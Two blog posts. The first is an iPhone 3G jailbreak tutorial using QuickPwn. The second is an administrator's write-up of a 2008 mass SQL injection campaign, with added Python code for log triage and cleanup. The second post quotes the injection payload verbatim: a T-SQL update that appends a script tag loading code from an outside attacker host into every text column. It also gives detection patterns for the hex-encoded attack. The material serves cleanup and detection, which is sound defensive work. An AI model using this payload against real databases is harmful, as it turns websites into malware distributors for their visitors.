
How to Jailbreak 2.02 iPhone 3g with QuickPwn 1.0 on a Mac

Wetwired Time Saturday, September 6th, 2008 at 9:15 am by pylorns

OK, a few notes about QuickPwn. Compared to Pwnage Tool, it makes it much easier for the novice to jailbreak an iPhone, iPhone 3G or iPod touch. I did not test this on a “clean” iPhone, as mine was already jailbroken the first time, but iphone-dev doesn’t have any notes that say you can’t do it on clean iPhones. So here is the tutorial for doing this on an already jailbroken iPhone 3G; as always, back up first, do it at your own risk, yada yada. Most likely doing it on a clean iPhone works exactly the same way.

Also, you have to be at 2.02 in order for this to work. I’ll walk you through that update if you haven’t done it already.

1. Browse out to http://blog.iphone-dev.org and pull down the QuickPwn file from their site or through BitTorrent. Remember to use the native Archive Utility and not “The Unarchiver”. Once you have it downloaded and extracted, chill out a moment and fire up iTunes.

2. Ask yourself this question: “Do I feel lucky?” Then decide that you don’t, and back up your iPhone. You should have already, but I wanted to remind you again.

Once you have iTunes started and your iPhone plugged in you should get this message; choose to download and install.

3. Click Next for the update; as you can see, it says “bug fixes”. Can we get any more generic?

4. Agree to sell your soul to Steve and click next.

5. Now when you do this you may think, what the hell, the screen disappeared. Steve’s come to collect my soul early! No, like all iTunes downloads it just put it in the Downloads section.

6. As soon as it finishes you’ll get this screen.

7. And then this one…

8. And then…

9. Boom, done: you’re at 2.02, Apple-legit software, and if you had any jailbroken apps they are gone. Your iPhone should reboot and you’ll get the old favorite Apple logo.

10. Now you can fire up QuickPwn. Double-click to launch the goodness.

11. Click OK that you have been warned. You should know the drill: you can’t hold them, me or anyone else but yourself responsible for bricking your iPhone.

12. Keep following ye’ old onscreen instructions. Your device should already be connected, so just click OK, or it may have jumped right to detecting your device. Mine was rebooting when I took this screenshot, so it popped up right after this.

13. Next it should pop up with this screen. Basically it is going to go out and look for the 2.02 firmware in iTunes. You don’t need to re-download or do anything. I had to close iTunes after a minute, but clicking Yes makes QuickPwn do the work, and it worked, so I didn’t run into anything too out of the ordinary aside from not expecting it to fire up iTunes. If you didn’t get this, or it’s finished, or you’ve done this before, just click the device and it should continue.

14. As mentioned before, here and on the dev site, you don’t get the option to choose how your custom firmware package is built; this puts it all in. So put in your username/password and click “OK”.

15. OK, so I didn’t get the immediate next screenshot, but basically we’re repeating the same steps you should already know to get your phone into DFU mode. Follow the steps on screen. If you have never done this before, just follow the on-screen prompts, and if you still have problems check the bottom of this post for a tip on DFU mode.

16. And we’re holding…

17. And we’re holding… and boom, you’ll see it automatically sends the firmware, as opposed to the crazy stuff you had to do with Pwnage Tool.

18. And here is where it gets tricky. It took approximately 2-5 minutes, but it rebooted. Then my phone just hung there. I went out and checked online; others were saying that they just re-did everything and freaked out. Some say they waited 20 minutes, or they rebooted and it would continue to just hang at the pineapple. See below.

19. For me, I watched it reboot after 5 minutes the first time. Then it hung there for about 10 minutes. I started to get pissed, but I held down the home button and power button to turn it off. I then powered it back on again, let the pineapple sit for a couple of minutes and boom. It came up fine, jailbroken, nothing wrong. Cydia, Installer, all came back; I didn’t have to restore my music from iTunes after the fact or do anything else wonky, which made the experience much less painful.

If you had problems getting the phone into DFU mode, follow DJ Felix’s method:

* Turn off the iPhone
* Hold the home button
* Plug it into USB
* Watch for DFU mode

Anyway, comment below; if you saw or experienced something else, please share, as it could help others.

Technical Post about new SQL Injection

Wetwired Time Wednesday, August 6th, 2008 at 12:48 pm by davis

Wikipedia says,

“SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.”

New SQL injection variant I stumbled on at work

Basically what it does is open 2 iframes and then install a cookie; it’s also injecting into whatever database is there. I have not gone through all the code, but it has already changed since this morning. It is a very bad little piece of java.

*** DO NOT GO TO THIS URL (I have added spaces to eliminate accidental clicking) ***

Here is the code for the new injection:

BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaoduo. 3322.org/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://jjmaoduo. 3322.org/csrss/w.js"></script><!--''')

Notice the beginning of the insert. It's not the traditional <script opener; it starts with "></title><script src= instead.

Bastards did it to get around the reverse-string cleaning method. Here is a modified script that takes the new "></title><script src= prefix into account. Oh, also notice the closing HTML comment (<!--) at the end: that was put there to defeat the previous script's WHERE clause, which matched on a trailing </script>.

/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
-- every user table column of type ntext (99), text (35), nvarchar (231) or varchar (167)
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- the marker '>eltit/<>"' is the reverse of the injected prefix '"></title>' (10 chars), hence the + 9:
-- everything in the reversed value up to and including the marker is the injection, the rest is the original content
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(''%>eltit/<>"%'', reverse(convert(varchar (max),['+@C+']))) + 9))) where ['+@C+'] like ''%"></title>%<!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/

The old cleaning script is below, for reference against my notes above.
/*****Begin Script*****/
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- marker 'tpircs<' is the reverse of '<script' (7 chars), hence the + 6
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(convert(varchar (max),['+@C+'])), len(convert(varchar (max),['+@C+'])) - (patindex(''%tpircs<%'', reverse(convert(varchar (max),['+@C+']))) + 6))) where ['+@C+'] like ''%<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;
/*****End Script*****/
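The two cleaning scripts above are easier to reason about once the reverse()/patindex()/right() arithmetic is spelled out, so here is a Python model of it. This is an added example, not the blog's or the attacker's code: the two injected strings are reconstructed from the post, the column values are constructed samples, and the functions mirror the T-SQL one-to-one (patindex is 1-based and returns 0 when the marker is absent; the skip value is always the marker length minus one). It also shows the two things a practitioner wants to know before running the SQL job: the old script's WHERE clause does not match the new variant at all, and one pass only removes the last appended copy, so a column that was hit twice needs the job re-run.

```python
# Added example (not the blog's own code): a Python model of the T-SQL cleanup
#   reverse(right(reverse(v), len(v) - (patindex('%<marker>%', reverse(v)) + skip)))
# so its arithmetic and its WHERE guard can be checked outside SQL Server.
# The injected strings are reconstructed from the post; column values are constructed.

NEW_INJECT = '"></title><script src="http://jjmaoduo.3322.org/csrss/w.js"></script><!--'
OLD_INJECT = '<script src="http://jjmaoduo.3322.org/csrss/w.js"></script>'


def strip_like_tsql(value, reversed_marker, skip):
    """Mirror of the T-SQL expression. patindex() is 1-based and yields 0 when the
    marker is absent; right(s, n) keeps the last n characters (n <= 0 keeps nothing,
    and T-SQL errors on a negative n, which the WHERE clause is meant to prevent)."""
    r = value[::-1]
    pos = r.find(reversed_marker)
    patindex = pos + 1 if pos >= 0 else 0
    keep = len(r) - (patindex + skip)
    if keep <= 0:
        return ""
    return r[len(r) - keep:][::-1]


def clean_old_variant(value):
    """The original cleaning script: WHERE col LIKE '%<script%</script>',
    marker 'tpircs<' (reverse of '<script', 7 chars) and skip 6."""
    if "<script" in value and value.endswith("</script>"):
        return strip_like_tsql(value, "tpircs<", 6)
    return value  # WHERE clause did not match: row left untouched


def clean_new_variant(value):
    """The updated script: WHERE col LIKE '%\"></title>%<!--',
    marker '>eltit/<>\"' (reverse of '\"></title>', 10 chars) and skip 9."""
    if '"></title>' in value and value.endswith("<!--"):
        return strip_like_tsql(value, '>eltit/<>"', 9)
    return value


def clean_until_stable(value, cleaner):
    """patindex on the reversed string finds the LAST injected copy in the original,
    so one pass strips one copy; repeat until nothing changes (i.e. re-run the SQL job)."""
    while True:
        cleaned = cleaner(value)
        if cleaned == value:
            return cleaned
        value = cleaned


if __name__ == "__main__":
    hit_once = "Product description" + NEW_INJECT
    hit_twice = "Product description" + NEW_INJECT + NEW_INJECT
    print("old script on new variant :", clean_old_variant(hit_once) == hit_once)   # True: not matched
    print("new script, hit once      :", clean_new_variant(hit_once))
    print("new script, hit twice     :", clean_new_variant(hit_twice))              # one copy left
    print("repeated until stable     :", clean_until_stable(hit_twice, clean_new_variant))
```

The rule of thumb the model makes visible: pick the marker as the reverse of the injected prefix, set the skip to the marker length minus one, and keep the WHERE clause, because a patindex of 0 would otherwise silently chop the tail of every clean column.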

To find out which web pages are being hit, go to the root of your web logs.

In IIS there should be a site identifier that will help you locate which site it is.

From the root of the web logs issue this command (this searches today's log; if it happened yesterday, search that day's log instead):

findstr /s /i /n /c:"declare" ex080807.log >> sql_inj_sites_080807.txt

This will recursively check all sub-folders for the word "declare" (case-insensitive) and append the matching lines, with file name and line number, to the text file.

If you check that text file you probably have something that looks like this:

W3SVC12345678\ex080807.log:99:2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 67.42.4.85 GET /index.asp?topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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%20AS%20CHAR(4000));EXEC(@S); 200

I truncated some of the rest because it's not important, EXCEPT for the HTTP return code.

200 is of course OK, which means the web server processed the request.

So the injected query string hit index.asp in the site identified as W3SVC12345678.

You can find out which site that is by going into inetmgr and looking at the site identifier field.

If you are a little more curious, you can recover the SQL being injected by translating the hex between the 0x and the %20AS% from hex into ASCII; that gives you the SQL the server was asked to execute.
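The findstr search and the hex translation above are the two halves of a triage step, so here they are as one script. This is an added example, not the blog's tooling: the IIS log excerpt is constructed (with cs-uri-stem and cs-uri-query as the separate fields IIS writes, rather than joined with a ?), the hidden SQL is a harmless placeholder rather than the real payload, and the decoder goes one step beyond the post by also handling the NVARCHAR form of the CAST, where the hex is UTF-16LE rather than one byte per character.

```python
# Added example (not the blog's own code): triage IIS W3C logs for the
# DECLARE ... CAST(0x... AS CHAR(4000)) injection, report which site/page was hit
# and whether the request returned 200, and decode the hex back into SQL.
import binascii
import re
from collections import Counter
from urllib.parse import unquote

# Constructed placeholder for the SQL hidden inside the CAST; not the real injection.
INNER_SQL = "DECLARE @T varchar(255) SELECT @T='constructed sample'"
HEX_CHAR = binascii.hexlify(INNER_SQL.encode("ascii")).decode().upper()       # CHAR: 1 byte per char
HEX_NCHAR = binascii.hexlify(INNER_SQL.encode("utf-16-le")).decode().upper()  # NVARCHAR: UTF-16LE

# Constructed IIS W3C extended log excerpt; column order comes from the #Fields directive.
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-sitename s-computername c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-08-07 12:55:01 W3SVC12345678 MY-WEBSERVER-HOSTNAME 192.0.2.7 GET /index.asp topic=4 200
2008-08-07 12:57:12 W3SVC12345678 MY-WEBSERVER-HOSTNAME 192.0.2.10 GET /index.asp topic=4;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x{HEX_CHAR}%20AS%20CHAR(4000));EXEC(@S); 200
2008-08-07 12:58:40 W3SVC87654321 MY-WEBSERVER-HOSTNAME 192.0.2.10 GET /news.asp id=7;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{HEX_NCHAR}%20AS%20NVARCHAR(4000));EXEC(@S); 500
"""

CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(", re.IGNORECASE)


def decode_cast_payload(query):
    """Recover the SQL hidden in CAST(0x... AS [N][VAR]CHAR(n)); None if the query has none.
    CHAR/VARCHAR payloads are one byte per character, NCHAR/NVARCHAR payloads are UTF-16LE."""
    m = CAST_RE.search(unquote(query))  # %20 -> space, as in the log line
    if not m or len(m.group(1)) % 2:
        return None
    raw = bytes.fromhex(m.group(1))
    encoding = "utf-16-le" if m.group(2).upper() == "N" else "latin-1"
    return raw.decode(encoding, errors="replace")


def parse_iis_log(text):
    """Turn W3C log lines into dicts keyed by the names in the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            rows.append(dict(zip(fields, parts)))
    return rows


def find_injection_attempts(text):
    """The findstr /i /c:"declare" step, plus site, page, status and decoded SQL per hit."""
    hits = []
    for row in parse_iis_log(text):
        query = row.get("cs-uri-query", "")
        if "declare" not in unquote(query).lower():
            continue
        hits.append({
            "site": row["s-sitename"],        # look this id up in inetmgr
            "page": row["cs-uri-stem"],
            "client": row["c-ip"],
            "status": int(row["sc-status"]),
            "processed": row["sc-status"] == "200",  # 200 means the server ran the request
            "sql": decode_cast_payload(query),
        })
    return hits


def sites_hit(text):
    """How many injection attempts each site identifier received."""
    return Counter(hit["site"] for hit in find_injection_attempts(text))


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit["site"], hit["page"], hit["status"], "processed" if hit["processed"] else "rejected")
        print("   decoded SQL:", hit["sql"])
    print(dict(sites_hit(SAMPLE_LOG)))
```

Only hits with a 200 are worth the cleanup job; a 500 from the same client shows the attempt was made but the page did not run it, which still tells you which site and page are exposed.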

Comments/Questions etc.  Thanks.
